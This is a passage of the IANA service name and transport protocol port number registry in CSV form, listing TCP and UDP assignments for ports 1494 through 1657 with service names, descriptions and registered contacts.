ica,1494,udp,ica,[John_Richardson],[John_Richardson],,,,,, cvc,1495,tcp,cvc,[Bill_Davidson],[Bill_Davidson],,,,,, cvc,1495,udp,cvc,[Bill_Davidson],[Bill_Davidson],,,,,, liberty-lm,1496,tcp,liberty-lm,[Jim_Rogers],[Jim_Rogers],,,,,, liberty-lm,1496,udp,liberty-lm,[Jim_Rogers],[Jim_Rogers],,,,,, rfx-lm,1497,tcp,rfx-lm,[Bill_Bishop],[Bill_Bishop],,,,,, rfx-lm,1497,udp,rfx-lm,[Bill_Bishop],[Bill_Bishop],,,,,, sybase-sqlany,1498,tcp,Sybase SQL Any,[Dave_Neudoerffer],[Dave_Neudoerffer],,,,,, sybase-sqlany,1498,udp,Sybase SQL Any,[Dave_Neudoerffer],[Dave_Neudoerffer],,,,,, fhc,1499,tcp,Federico Heinz Consultora,[Federico_Heinz],[Federico_Heinz],,,,,, fhc,1499,udp,Federico Heinz Consultora,[Federico_Heinz],[Federico_Heinz],,,,,, vlsi-lm,1500,tcp,VLSI License Manager,[Shue_Lin_Kuo],[Shue_Lin_Kuo],,,,,, vlsi-lm,1500,udp,VLSI License Manager,[Shue_Lin_Kuo],[Shue_Lin_Kuo],,,,,, saiscm,1501,tcp,Satellite-data Acquisition System 3,[Bill_Taylor],[Bill_Taylor],,,,,, saiscm,1501,udp,Satellite-data Acquisition System 3,[Bill_Taylor],[Bill_Taylor],,,,,, shivadiscovery,1502,tcp,Shiva,[Jonathan_Wenocur],[Jonathan_Wenocur],,,,,, shivadiscovery,1502,udp,Shiva,[Jonathan_Wenocur],[Jonathan_Wenocur],,,,,, imtc-mcs,1503,tcp,Databeam,[Jim_Johnston],[Jim_Johnston],,,,,, imtc-mcs,1503,udp,Databeam,[Jim_Johnston],[Jim_Johnston],,,,,, evb-elm,1504,tcp,EVB Software Engineering License Manager,[B_G_Mahesh],[B_G_Mahesh],,,,,, evb-elm,1504,udp,EVB Software Engineering License Manager,[B_G_Mahesh],[B_G_Mahesh],,,,,, funkproxy,1505,tcp,"Funk Software, Inc.",[Robert_D_Vincent],[Robert_D_Vincent],,,,,, funkproxy,1505,udp,"Funk Software, Inc.",[Robert_D_Vincent],[Robert_D_Vincent],,,,,, utcd,1506,tcp,Universal Time daemon (utcd),[Walter_Poxon],[Walter_Poxon],,,,,, utcd,1506,udp,Universal Time daemon (utcd),[Walter_Poxon],[Walter_Poxon],,,,,, symplex,1507,tcp,symplex,[Mike_Turley],[Mike_Turley],,,,,, symplex,1507,udp,symplex,[Mike_Turley],[Mike_Turley],,,,,, diagmond,1508,tcp,diagmond,[Pete_Moscatelli],[Pete_Moscatelli],,,,,, diagmond,1508,udp,diagmond,[Pete_Moscatelli],[Pete_Moscatelli],,,,,, robcad-lm,1509,tcp,"Robcad, Ltd. License Manager",[Hindin_Joseph],[Hindin_Joseph],,,,,, robcad-lm,1509,udp,"Robcad, Ltd. License Manager",[Hindin_Joseph],[Hindin_Joseph],,,,,, mvx-lm,1510,tcp,Midland Valley Exploration Ltd. Lic. Man.,[Neil_Salter],[Neil_Salter],,,,,, mvx-lm,1510,udp,Midland Valley Exploration Ltd. Lic. Man.,[Neil_Salter],[Neil_Salter],,,,,, 3l-l1,1511,tcp,3l-l1,[Ian_A_Young],[Ian_A_Young],,,,,, 3l-l1,1511,udp,3l-l1,[Ian_A_Young],[Ian_A_Young],,,,,, wins,1512,tcp,Microsoft's Windows Internet Name Service,[Pradeep_Bahl],[Pradeep_Bahl],,,,,, wins,1512,udp,Microsoft's Windows Internet Name Service,[Pradeep_Bahl],[Pradeep_Bahl],,,,,, fujitsu-dtc,1513,tcp,"Fujitsu Systems Business of America, Inc",,,,,,,, fujitsu-dtc,1513,udp,"Fujitsu Systems Business of America, Inc",,,,,,,, fujitsu-dtcns,1514,tcp,"Fujitsu Systems Business of America, Inc",[Charles_A_Higgins],[Charles_A_Higgins],,,,,, fujitsu-dtcns,1514,udp,"Fujitsu Systems Business of America, Inc",[Charles_A_Higgins],[Charles_A_Higgins],,,,,, ifor-protocol,1515,tcp,ifor-protocol,[Dr_R_P_Alston],[Dr_R_P_Alston],,,,,, ifor-protocol,1515,udp,ifor-protocol,[Dr_R_P_Alston],[Dr_R_P_Alston],,,,,, vpad,1516,tcp,Virtual Places Audio data,,,,,,,, vpad,1516,udp,Virtual Places Audio data,,,,,,,, vpac,1517,tcp,Virtual Places Audio control,,,,,,,, vpac,1517,udp,Virtual Places Audio control,,,,,,,, vpvd,1518,tcp,Virtual Places Video data,,,,,,,, vpvd,1518,udp,Virtual Places Video data,,,,,,,, vpvc,1519,tcp,Virtual Places Video control,[Avshalom_Houri],[Avshalom_Houri],,,,,, vpvc,1519,udp,Virtual Places Video control,[Avshalom_Houri],[Avshalom_Houri],,,,,, atm-zip-office,1520,tcp,atm zip office,[Wilson_Kwan],[Wilson_Kwan],,,,,, atm-zip-office,1520,udp,atm zip office,[Wilson_Kwan],[Wilson_Kwan],,,,,, ncube-lm,1521,tcp,nCube License Manager,[Maxine_Yuen],[Maxine_Yuen],,,,,, ncube-lm,1521,udp,nCube License Manager,[Maxine_Yuen],[Maxine_Yuen],,,,,, ricardo-lm,1522,tcp,Ricardo North America License Manager,[Mike_Flemming],[Mike_Flemming],,,,,, ricardo-lm,1522,udp,Ricardo North America License Manager,[Mike_Flemming],[Mike_Flemming],,,,,, cichild-lm,1523,tcp,cichild,[Andy_Burgess],[Andy_Burgess],,,,,, cichild-lm,1523,udp,cichild,[Andy_Burgess],[Andy_Burgess],,,,,, ingreslock,1524,tcp,ingres,,,,,,,, ingreslock,1524,udp,ingres,,,,,,,, orasrv,1525,tcp,oracle,,,,,,,, orasrv,1525,udp,oracle,,,,,,,, prospero-np,1525,tcp,Prospero Directory Service non-priv,,,,,,,, prospero-np,1525,udp,Prospero Directory Service non-priv,,,,,,,, pdap-np,1526,tcp,Prospero Data Access Prot non-priv,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, pdap-np,1526,udp,Prospero Data Access Prot non-priv,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, tlisrv,1527,tcp,oracle,,,,,,,, tlisrv,1527,udp,oracle,,,,,,,, ,1528,,Unassigned,,,,2007-10-04,,,, coauthor,1529,tcp,oracle,,,,,,,, coauthor,1529,udp,oracle,,,,,,,, rap-service,1530,tcp,rap-service,,,,,,,, rap-service,1530,udp,rap-service,,,,,,,, rap-listen,1531,tcp,rap-listen,[Phil_Servita],[Phil_Servita],,,,,, rap-listen,1531,udp,rap-listen,[Phil_Servita],[Phil_Servita],,,,,, miroconnect,1532,tcp,miroconnect,[Michael_Fischer_2],[Michael_Fischer_2],,,,,, miroconnect,1532,udp,miroconnect,[Michael_Fischer_2],[Michael_Fischer_2],,,,,, virtual-places,1533,tcp,Virtual Places Software,[Avshalom_Houri],[Avshalom_Houri],,,,,, virtual-places,1533,udp,Virtual Places Software,[Avshalom_Houri],[Avshalom_Houri],,,,,, micromuse-lm,1534,tcp,micromuse-lm,[Adam_Kerrison],[Adam_Kerrison],,,,,, micromuse-lm,1534,udp,micromuse-lm,[Adam_Kerrison],[Adam_Kerrison],,,,,, ampr-info,1535,tcp,ampr-info,,,,,,,, ampr-info,1535,udp,ampr-info,,,,,,,, ampr-inter,1536,tcp,ampr-inter,[Rob_Janssen],[Rob_Janssen],,,,,, ampr-inter,1536,udp,ampr-inter,[Rob_Janssen],[Rob_Janssen],,,,,, sdsc-lm,1537,tcp,isi-lm,[Len_Wanger],[Len_Wanger],,,,,, sdsc-lm,1537,udp,isi-lm,[Len_Wanger],[Len_Wanger],,,,,, 3ds-lm,1538,tcp,3ds-lm,[Keith_Trummel],[Keith_Trummel],,,,,, 3ds-lm,1538,udp,3ds-lm,[Keith_Trummel],[Keith_Trummel],,,,,, intellistor-lm,1539,tcp,Intellistor License Manager,[Ron_Vaughn],[Ron_Vaughn],,,,,, intellistor-lm,1539,udp,Intellistor License Manager,[Ron_Vaughn],[Ron_Vaughn],,,,,, rds,1540,tcp,rds,,,,,,,, rds,1540,udp,rds,,,,,,,, rds2,1541,tcp,rds2,[Sudhakar_Rajamannar],[Sudhakar_Rajamannar],,,,,, rds2,1541,udp,rds2,[Sudhakar_Rajamannar],[Sudhakar_Rajamannar],,,,,, gridgen-elmd,1542,tcp,gridgen-elmd,[John_R_Chawner],[John_R_Chawner],,,,,, gridgen-elmd,1542,udp,gridgen-elmd,[John_R_Chawner],[John_R_Chawner],,,,,, simba-cs,1543,tcp,simba-cs,[Betsy_Alexander],[Betsy_Alexander],,,,,, simba-cs,1543,udp,simba-cs,[Betsy_Alexander],[Betsy_Alexander],,,,,, aspeclmd,1544,tcp,aspeclmd,[V_Balaji],[V_Balaji],,,,,, aspeclmd,1544,udp,aspeclmd,[V_Balaji],[V_Balaji],,,,,, vistium-share,1545,tcp,vistium-share,[Allison_Carleton],[Allison_Carleton],,,,,, vistium-share,1545,udp,vistium-share,[Allison_Carleton],[Allison_Carleton],,,,,, abbaccuray,1546,tcp,abbaccuray,[John_Wendt],[John_Wendt],,,,,, abbaccuray,1546,udp,abbaccuray,[John_Wendt],[John_Wendt],,,,,, laplink,1547,tcp,laplink,[Michael_Crawford],[Michael_Crawford],,,,,, laplink,1547,udp,laplink,[Michael_Crawford],[Michael_Crawford],,,,,, axon-lm,1548,tcp,Axon License Manager,[Mark_Pearce],[Mark_Pearce],,,,,, axon-lm,1548,udp,Axon License Manager,[Mark_Pearce],[Mark_Pearce],,,,,, shivahose,1549,tcp,Shiva Hose,,,,,,,, shivasound,1549,udp,Shiva Sound,[Kin_Chan],[Kin_Chan],,,,,, 3m-image-lm,1550,tcp,Image Storage license manager 3M Company,[J_C_Canessa],[J_C_Canessa],,,,,, 3m-image-lm,1550,udp,Image Storage license manager 3M Company,[J_C_Canessa],[J_C_Canessa],,,,,, hecmtl-db,1551,tcp,HECMTL-DB,[Maxime_Belanger],[Maxime_Belanger],,,,,, hecmtl-db,1551,udp,HECMTL-DB,[Maxime_Belanger],[Maxime_Belanger],,,,,, pciarray,1552,tcp,pciarray,[Ron_Folk],[Ron_Folk],,,,,, pciarray,1552,udp,pciarray,[Ron_Folk],[Ron_Folk],,,,,, sna-cs,1553,tcp,sna-cs,[Tony_Sowter],[Tony_Sowter],,,,,, sna-cs,1553,udp,sna-cs,[Tony_Sowter],[Tony_Sowter],,,,,, caci-lm,1554,tcp,CACI Products Company License Manager,[Erik_Blume],[Erik_Blume],,,,,, caci-lm,1554,udp,CACI Products Company License Manager,[Erik_Blume],[Erik_Blume],,,,,, livelan,1555,tcp,livelan,[Kaynam_Hedayat],[Kaynam_Hedayat],,,,,, livelan,1555,udp,livelan,[Kaynam_Hedayat],[Kaynam_Hedayat],,,,,, veritas-pbx,1556,tcp,"VERITAS Private Branch Exchange IANA assigned this well-formed service name as a replacement for ""veritas_pbx"".",[Stefan_Winkel],[Stefan_Winkel],2004-04,,,,, veritas_pbx,1556,tcp,VERITAS Private Branch Exchange,[Stefan_Winkel],[Stefan_Winkel],2004-04,,,,,"This entry is an alias to ""veritas-pbx"". This entry is now historic, not usable for use with many common service discovery mechanisms." veritas-pbx,1556,udp,"VERITAS Private Branch Exchange IANA assigned this well-formed service name as a replacement for ""veritas_pbx"".",[Stefan_Winkel],[Stefan_Winkel],2004-04,,,,, veritas_pbx,1556,udp,VERITAS Private Branch Exchange,[Stefan_Winkel],[Stefan_Winkel],2004-04,,,,,"This entry is an alias to ""veritas-pbx"". This entry is now historic, not usable for use with many common service discovery mechanisms." arbortext-lm,1557,tcp,ArborText License Manager,[David_J_Wilson],[David_J_Wilson],,,,,, arbortext-lm,1557,udp,ArborText License Manager,[David_J_Wilson],[David_J_Wilson],,,,,, xingmpeg,1558,tcp,xingmpeg,[Howard_Gordon],[Howard_Gordon],,,,,, xingmpeg,1558,udp,xingmpeg,[Howard_Gordon],[Howard_Gordon],,,,,, web2host,1559,tcp,web2host,[Stephen_Johnson],[Stephen_Johnson],,,,,, web2host,1559,udp,web2host,[Stephen_Johnson],[Stephen_Johnson],,,,,, asci-val,1560,tcp,ASCI-RemoteSHADOW,[Benjamin_Rosenberg],[Benjamin_Rosenberg],,,,,, asci-val,1560,udp,ASCI-RemoteSHADOW,[Benjamin_Rosenberg],[Benjamin_Rosenberg],,,,,, facilityview,1561,tcp,facilityview,[Ed_Green],[Ed_Green],,,,,, facilityview,1561,udp,facilityview,[Ed_Green],[Ed_Green],,,,,, pconnectmgr,1562,tcp,pconnectmgr,[Bob_Kaiser],[Bob_Kaiser],,,,,, pconnectmgr,1562,udp,pconnectmgr,[Bob_Kaiser],[Bob_Kaiser],,,,,, cadabra-lm,1563,tcp,Cadabra License Manager,[Arthur_Castonguay],[Arthur_Castonguay],,,,,, cadabra-lm,1563,udp,Cadabra License Manager,[Arthur_Castonguay],[Arthur_Castonguay],,,,,, pay-per-view,1564,tcp,Pay-Per-View,[Brian_Tung],[Brian_Tung],,,,,, pay-per-view,1564,udp,Pay-Per-View,[Brian_Tung],[Brian_Tung],,,,,, winddlb,1565,tcp,WinDD,[Kelly_Sims],[Kelly_Sims],,,,,, winddlb,1565,udp,WinDD,[Kelly_Sims],[Kelly_Sims],,,,,, corelvideo,1566,tcp,CORELVIDEO,[Ming_Poon],[Ming_Poon],,,,,, corelvideo,1566,udp,CORELVIDEO,[Ming_Poon],[Ming_Poon],,,,,, jlicelmd,1567,tcp,jlicelmd,[Christian_Schormann],[Christian_Schormann],,,,,, jlicelmd,1567,udp,jlicelmd,[Christian_Schormann],[Christian_Schormann],,,,,, tsspmap,1568,tcp,tsspmap,[Paul_W_Nelson],[Paul_W_Nelson],,,,,, tsspmap,1568,udp,tsspmap,[Paul_W_Nelson],[Paul_W_Nelson],,,,,, ets,1569,tcp,ets,[Carstein_Seeberg],[Carstein_Seeberg],,,,,, ets,1569,udp,ets,[Carstein_Seeberg],[Carstein_Seeberg],,,,,, orbixd,1570,tcp,orbixd,[Bridget_Walsh],[Bridget_Walsh],,,,,, orbixd,1570,udp,orbixd,[Bridget_Walsh],[Bridget_Walsh],,,,,, rdb-dbs-disp,1571,tcp,Oracle Remote Data Base,[mackin],[mackin],,,,,, rdb-dbs-disp,1571,udp,Oracle Remote Data Base,[mackin],[mackin],,,,,, chip-lm,1572,tcp,Chipcom License Manager,,,,,,,, chip-lm,1572,udp,Chipcom License Manager,,,,,,,, itscomm-ns,1573,tcp,itscomm-ns,[Rich_Thompson],[Rich_Thompson],,,,,, itscomm-ns,1573,udp,itscomm-ns,[Rich_Thompson],[Rich_Thompson],,,,,, mvel-lm,1574,tcp,mvel-lm,[David_Bisset],[David_Bisset],,,,,, mvel-lm,1574,udp,mvel-lm,[David_Bisset],[David_Bisset],,,,,, oraclenames,1575,tcp,oraclenames,[P_V_Shivkumar],[P_V_Shivkumar],,,,,, oraclenames,1575,udp,oraclenames,[P_V_Shivkumar],[P_V_Shivkumar],,,,,, moldflow-lm,1576,tcp,Moldflow License Manager,[Lech_Laskowski],[Lech_Laskowski],,,,,, moldflow-lm,1576,udp,Moldflow License Manager,[Lech_Laskowski],[Lech_Laskowski],,,,,, hypercube-lm,1577,tcp,hypercube-lm,[Christopher_McLendon],[Christopher_McLendon],,,,,, hypercube-lm,1577,udp,hypercube-lm,[Christopher_McLendon],[Christopher_McLendon],,,,,, jacobus-lm,1578,tcp,Jacobus License Manager,[Tony_Cleveland],[Tony_Cleveland],,,,,, jacobus-lm,1578,udp,Jacobus License Manager,[Tony_Cleveland],[Tony_Cleveland],,,,,, ioc-sea-lm,1579,tcp,ioc-sea-lm,[Paul_Nelson],[Paul_Nelson],,,,,, ioc-sea-lm,1579,udp,ioc-sea-lm,[Paul_Nelson],[Paul_Nelson],,,,,, tn-tl-r1,1580,tcp,tn-tl-r1,,,,,,,, tn-tl-r2,1580,udp,tn-tl-r2,[Ed_Kress],[Ed_Kress],,,,,, mil-2045-47001,1581,tcp,MIL-2045-47001,[Eric_Whitehill],[Eric_Whitehill],,,,,, mil-2045-47001,1581,udp,MIL-2045-47001,[Eric_Whitehill],[Eric_Whitehill],,,,,, msims,1582,tcp,MSIMS,[Glenn_Olander],[Glenn_Olander],,,,,, msims,1582,udp,MSIMS,[Glenn_Olander],[Glenn_Olander],,,,,, simbaexpress,1583,tcp,simbaexpress,[Betsy_Alexander],[Betsy_Alexander],,,,,, simbaexpress,1583,udp,simbaexpress,[Betsy_Alexander],[Betsy_Alexander],,,,,, tn-tl-fd2,1584,tcp,tn-tl-fd2,[Ed_Kress],[Ed_Kress],,,,,, tn-tl-fd2,1584,udp,tn-tl-fd2,[Ed_Kress],[Ed_Kress],,,,,, intv,1585,tcp,intv,[Dermot_Tynand],[Dermot_Tynand],,,,,, intv,1585,udp,intv,[Dermot_Tynand],[Dermot_Tynand],,,,,, ibm-abtact,1586,tcp,ibm-abtact,[Sandeep_K_Singhal],[Sandeep_K_Singhal],,,,,, ibm-abtact,1586,udp,ibm-abtact,[Sandeep_K_Singhal],[Sandeep_K_Singhal],,,,,, pra-elmd,1587,tcp,"pra_elmd IANA assigned this well-formed service name as a replacement for ""pra_elmd"".",[Dennis_Mastin],[Dennis_Mastin],,,,,, pra_elmd,1587,tcp,pra_elmd,[Dennis_Mastin],[Dennis_Mastin],,,,,,"This entry is an alias to ""pra-elmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." pra-elmd,1587,udp,"pra_elmd IANA assigned this well-formed service name as a replacement for ""pra_elmd"".",[Dennis_Mastin],[Dennis_Mastin],,,,,, pra_elmd,1587,udp,pra_elmd,[Dennis_Mastin],[Dennis_Mastin],,,,,,"This entry is an alias to ""pra-elmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." triquest-lm,1588,tcp,triquest-lm,[Nand_Kumar],[Nand_Kumar],,,,,, triquest-lm,1588,udp,triquest-lm,[Nand_Kumar],[Nand_Kumar],,,,,, vqp,1589,tcp,VQP,[Keith_McCloghrie],[Keith_McCloghrie],,,,,, vqp,1589,udp,VQP,[Keith_McCloghrie],[Keith_McCloghrie],,,,,, gemini-lm,1590,tcp,gemini-lm,[Tony_Sawyer],[Tony_Sawyer],,,,,, gemini-lm,1590,udp,gemini-lm,[Tony_Sawyer],[Tony_Sawyer],,,,,, ncpm-pm,1591,tcp,ncpm-pm,[Ted_Power],[Ted_Power],,,,,, ncpm-pm,1591,udp,ncpm-pm,[Ted_Power],[Ted_Power],,,,,, commonspace,1592,tcp,commonspace,[Rob_Chandhok_2],[Rob_Chandhok_2],,,,,, commonspace,1592,udp,commonspace,[Rob_Chandhok_2],[Rob_Chandhok_2],,,,,, mainsoft-lm,1593,tcp,mainsoft-lm,[Anand_Gangadharan],[Anand_Gangadharan],,,,,, mainsoft-lm,1593,udp,mainsoft-lm,[Anand_Gangadharan],[Anand_Gangadharan],,,,,, sixtrak,1594,tcp,sixtrak,[Bob_Rennie],[Bob_Rennie],,,,,, sixtrak,1594,udp,sixtrak,[Bob_Rennie],[Bob_Rennie],,,,,, radio,1595,tcp,radio,,,,,,,, radio,1595,udp,radio,,,,,,,, radio-sm,1596,tcp,radio-sm,,,,,,,, radio-bc,1596,udp,radio-bc,[Ken_Chapman],[Ken_Chapman],,,,,, orbplus-iiop,1597,tcp,orbplus-iiop,[Robert_A_Kukura],[Robert_A_Kukura],,,,,, orbplus-iiop,1597,udp,orbplus-iiop,[Robert_A_Kukura],[Robert_A_Kukura],,,,,, picknfs,1598,tcp,picknfs,[John_Lombardo],[John_Lombardo],,,,,, picknfs,1598,udp,picknfs,[John_Lombardo],[John_Lombardo],,,,,, simbaservices,1599,tcp,simbaservices,[Betsy_Alexander],[Betsy_Alexander],,,,,, simbaservices,1599,udp,simbaservices,[Betsy_Alexander],[Betsy_Alexander],,,,,, issd,1600,tcp,issd,,,,,,,, issd,1600,udp,issd,,,,,,,, aas,1601,tcp,aas,[Bob_Beard],[Bob_Beard],,,,,, aas,1601,udp,aas,[Bob_Beard],[Bob_Beard],,,,,, inspect,1602,tcp,inspect,[Frank_O_Neill],[Frank_O_Neill],,,,,, inspect,1602,udp,inspect,[Frank_O_Neill],[Frank_O_Neill],,,,,, picodbc,1603,tcp,pickodbc,[John_Lombardo],[John_Lombardo],,,,,, picodbc,1603,udp,pickodbc,[John_Lombardo],[John_Lombardo],,,,,, icabrowser,1604,tcp,icabrowser,[Brad_Pedersen],[Brad_Pedersen],,,,,, icabrowser,1604,udp,icabrowser,[Brad_Pedersen],[Brad_Pedersen],,,,,, slp,1605,tcp,Salutation Manager (Salutation Protocol),,,,,,,, slp,1605,udp,Salutation Manager (Salutation Protocol),,,,,,,, slm-api,1606,tcp,Salutation Manager (SLM-API),[Tohru_Mori],[Tohru_Mori],,,,,, slm-api,1606,udp,Salutation Manager (SLM-API),[Tohru_Mori],[Tohru_Mori],,,,,, stt,1607,tcp,stt,[Ryan_Bolz],[Ryan_Bolz],,,,,, stt,1607,udp,stt,[Ryan_Bolz],[Ryan_Bolz],,,,,, smart-lm,1608,tcp,Smart Corp. License Manager,[Connie_Qiu],[Connie_Qiu],,,,,, smart-lm,1608,udp,Smart Corp. License Manager,[Connie_Qiu],[Connie_Qiu],,,,,, isysg-lm,1609,tcp,isysg-lm,[Adam_Curtin],[Adam_Curtin],,,,,, isysg-lm,1609,udp,isysg-lm,[Adam_Curtin],[Adam_Curtin],,,,,, taurus-wh,1610,tcp,taurus-wh,[Jeff_Moffatt],[Jeff_Moffatt],,,,,, taurus-wh,1610,udp,taurus-wh,[Jeff_Moffatt],[Jeff_Moffatt],,,,,, ill,1611,tcp,Inter Library Loan,[Niall_Murphy],[Niall_Murphy],,,,,, ill,1611,udp,Inter Library Loan,[Niall_Murphy],[Niall_Murphy],,,,,, netbill-trans,1612,tcp,NetBill Transaction Server,,,,,,,, netbill-trans,1612,udp,NetBill Transaction Server,,,,,,,, netbill-keyrep,1613,tcp,NetBill Key Repository,,,,,,,, netbill-keyrep,1613,udp,NetBill Key Repository,,,,,,,, netbill-cred,1614,tcp,NetBill Credential Server,,,,,,,, netbill-cred,1614,udp,NetBill Credential Server,,,,,,,, netbill-auth,1615,tcp,NetBill Authorization Server,,,,,,,, netbill-auth,1615,udp,NetBill Authorization Server,,,,,,,, netbill-prod,1616,tcp,NetBill Product Server,[Marvin_Sirbu],[Marvin_Sirbu],,,,,, netbill-prod,1616,udp,NetBill Product Server,[Marvin_Sirbu],[Marvin_Sirbu],,,,,, nimrod-agent,1617,tcp,Nimrod Inter-Agent Communication,[Charles_Lynn],[Charles_Lynn],,,,,, nimrod-agent,1617,udp,Nimrod Inter-Agent Communication,[Charles_Lynn],[Charles_Lynn],,,,,, skytelnet,1618,tcp,skytelnet,[Byron_Jones],[Byron_Jones],,,,,, skytelnet,1618,udp,skytelnet,[Byron_Jones],[Byron_Jones],,,,,, xs-openstorage,1619,tcp,xs-openstorage,[XuiS_Software_Ltd],[XuiS_Software_Ltd],,,,,, xs-openstorage,1619,udp,xs-openstorage,[XuiS_Software_Ltd],[XuiS_Software_Ltd],,,,,, faxportwinport,1620,tcp,faxportwinport,[Chris_Wells],[Chris_Wells],,,,,, faxportwinport,1620,udp,faxportwinport,[Chris_Wells],[Chris_Wells],,,,,, softdataphone,1621,tcp,softdataphone,[Dror_Gill],[Dror_Gill],,,,,, softdataphone,1621,udp,softdataphone,[Dror_Gill],[Dror_Gill],,,,,, ontime,1622,tcp,ontime,[Keith_Rhodes],[Keith_Rhodes],,,,,, ontime,1622,udp,ontime,[Keith_Rhodes],[Keith_Rhodes],,,,,, jaleosnd,1623,tcp,jaleosnd,[Christian_Schormann],[Christian_Schormann],,,,,, jaleosnd,1623,udp,jaleosnd,[Christian_Schormann],[Christian_Schormann],,,,,, udp-sr-port,1624,tcp,udp-sr-port,[Herb_Jensen],[Herb_Jensen],,,,,, udp-sr-port,1624,udp,udp-sr-port,[Herb_Jensen],[Herb_Jensen],,,,,, svs-omagent,1625,tcp,svs-omagent,[Alberto_Berlen],[Alberto_Berlen],,,,,, svs-omagent,1625,udp,svs-omagent,[Alberto_Berlen],[Alberto_Berlen],,,,,, shockwave,1626,tcp,Shockwave,[Sarah_Allen],[Sarah_Allen],,,,,, shockwave,1626,udp,Shockwave,[Sarah_Allen],[Sarah_Allen],,,,,, t128-gateway,1627,tcp,T.128 Gateway,[Phil_May],[Phil_May],,,,,, t128-gateway,1627,udp,T.128 Gateway,[Phil_May],[Phil_May],,,,,, lontalk-norm,1628,tcp,LonTalk normal,,,,,,,, lontalk-norm,1628,udp,LonTalk normal,,,,,,,, lontalk-urgnt,1629,tcp,LonTalk urgent,[Bob_Dolin],[Bob_Dolin],2008-04-10,,,,, lontalk-urgnt,1629,udp,LonTalk urgent,[Bob_Dolin],[Bob_Dolin],2008-04-10,,,,, oraclenet8cman,1630,tcp,Oracle Net8 Cman,[Tong_Ming_Lee],[Tong_Ming_Lee],,,,,, oraclenet8cman,1630,udp,Oracle Net8 Cman,[Tong_Ming_Lee],[Tong_Ming_Lee],,,,,, visitview,1631,tcp,Visit view,[Tom_Whittaker],[Tom_Whittaker],,,,,, visitview,1631,udp,Visit view,[Tom_Whittaker],[Tom_Whittaker],,,,,, pammratc,1632,tcp,PAMMRATC,,,,,,,, pammratc,1632,udp,PAMMRATC,,,,,,,, pammrpc,1633,tcp,PAMMRPC,[John_Britton],[John_Britton],,,,,, pammrpc,1633,udp,PAMMRPC,[John_Britton],[John_Britton],,,,,, loaprobe,1634,tcp,Log On America Probe,[James_Tavares],[James_Tavares],,,,,, loaprobe,1634,udp,Log On America Probe,[James_Tavares],[James_Tavares],,,,,, edb-server1,1635,tcp,EDB Server 1,[Carlos_Portela],[Carlos_Portela],,,,,, edb-server1,1635,udp,EDB Server 1,[Carlos_Portela],[Carlos_Portela],,,,,, isdc,1636,tcp,ISP shared public data control,,,,,,,, isdc,1636,udp,ISP shared public data control,,,,,,,, islc,1637,tcp,ISP shared local data control,,,,,,,, islc,1637,udp,ISP shared local data control,,,,,,,, ismc,1638,tcp,ISP shared management control,[Nick_Austin],[Nick_Austin],,,,,, ismc,1638,udp,ISP shared management control,[Nick_Austin],[Nick_Austin],,,,,, cert-initiator,1639,tcp,cert-initiator,,,,,,,, cert-initiator,1639,udp,cert-initiator,,,,,,,, cert-responder,1640,tcp,cert-responder,[Tom_Markson],[Tom_Markson],,,,,, cert-responder,1640,udp,cert-responder,[Tom_Markson],[Tom_Markson],,,,,, invision,1641,tcp,InVision,[Christopher_Davey],[Christopher_Davey],,,,,, invision,1641,udp,InVision,[Christopher_Davey],[Christopher_Davey],,,,,, isis-am,1642,tcp,isis-am,,,,,,,, isis-am,1642,udp,isis-am,,,,,,,, isis-ambc,1643,tcp,isis-ambc,[Ken_Chapman],[Ken_Chapman],,,,,, isis-ambc,1643,udp,isis-ambc,[Ken_Chapman],[Ken_Chapman],,,,,, saiseh,1644,tcp,Satellite-data Acquisition System 4,[Bill_Taylor],[Bill_Taylor],,,,,, saiseh,1644,udp,Satellite-data Acquisition System 4,[Bill_Taylor],[Bill_Taylor],,,,,, sightline,1645,tcp,SightLine,[admin],[admin],,,,,, sightline,1645,udp,SightLine,[admin],[admin],,,,,, sa-msg-port,1646,tcp,sa-msg-port,[Eric_Whitehill],[Eric_Whitehill],,,,,, sa-msg-port,1646,udp,sa-msg-port,[Eric_Whitehill],[Eric_Whitehill],,,,,, rsap,1647,tcp,rsap,[Holger_Reif],[Holger_Reif],,,,,, rsap,1647,udp,rsap,[Holger_Reif],[Holger_Reif],,,,,, concurrent-lm,1648,tcp,concurrent-lm,[Maggie_Brinsford],[Maggie_Brinsford],,,,,, concurrent-lm,1648,udp,concurrent-lm,[Maggie_Brinsford],[Maggie_Brinsford],,,,,, kermit,1649,tcp,kermit,[Frank_da_Cruz],[Frank_da_Cruz],,,,,, kermit,1649,udp,kermit,[Frank_da_Cruz],[Frank_da_Cruz],,,,,, nkd,1650,tcp,nkdn,,,,,,,, nkd,1650,udp,nkd,,,,,,,, shiva-confsrvr,1651,tcp,"shiva_confsrvr IANA assigned this well-formed service name as a replacement for ""shiva_confsrvr"".",[Mike_Horowitz],[Mike_Horowitz],,,,,, shiva_confsrvr,1651,tcp,shiva_confsrvr,[Mike_Horowitz],[Mike_Horowitz],,,,,,"This entry is an alias to ""shiva-confsrvr"". This entry is now historic, not usable for use with many common service discovery mechanisms." shiva-confsrvr,1651,udp,"shiva_confsrvr IANA assigned this well-formed service name as a replacement for ""shiva_confsrvr"".",[Mike_Horowitz],[Mike_Horowitz],,,,,, shiva_confsrvr,1651,udp,shiva_confsrvr,[Mike_Horowitz],[Mike_Horowitz],,,,,,"This entry is an alias to ""shiva-confsrvr"". This entry is now historic, not usable for use with many common service discovery mechanisms." xnmp,1652,tcp,xnmp,[Ali_Saleh],[Ali_Saleh],,,,,, xnmp,1652,udp,xnmp,[Ali_Saleh],[Ali_Saleh],,,,,, alphatech-lm,1653,tcp,alphatech-lm,[Joseph_Hauk],[Joseph_Hauk],,,,,, alphatech-lm,1653,udp,alphatech-lm,[Joseph_Hauk],[Joseph_Hauk],,,,,, stargatealerts,1654,tcp,stargatealerts,[Tim_Coppernoll],[Tim_Coppernoll],,,,,, stargatealerts,1654,udp,stargatealerts,[Tim_Coppernoll],[Tim_Coppernoll],,,,,, dec-mbadmin,1655,tcp,dec-mbadmin,,,,,,,, dec-mbadmin,1655,udp,dec-mbadmin,,,,,,,, dec-mbadmin-h,1656,tcp,dec-mbadmin-h,[Nick_Shipman],[Nick_Shipman],,,,,, dec-mbadmin-h,1656,udp,dec-mbadmin-h,[Nick_Shipman],[Nick_Shipman],,,,,, fujitsu-mmpdc,1657,tcp,fujitsu-mmpdc,[Katsumi_Oomuro],[Katsumi_Oomuro],,,,,, 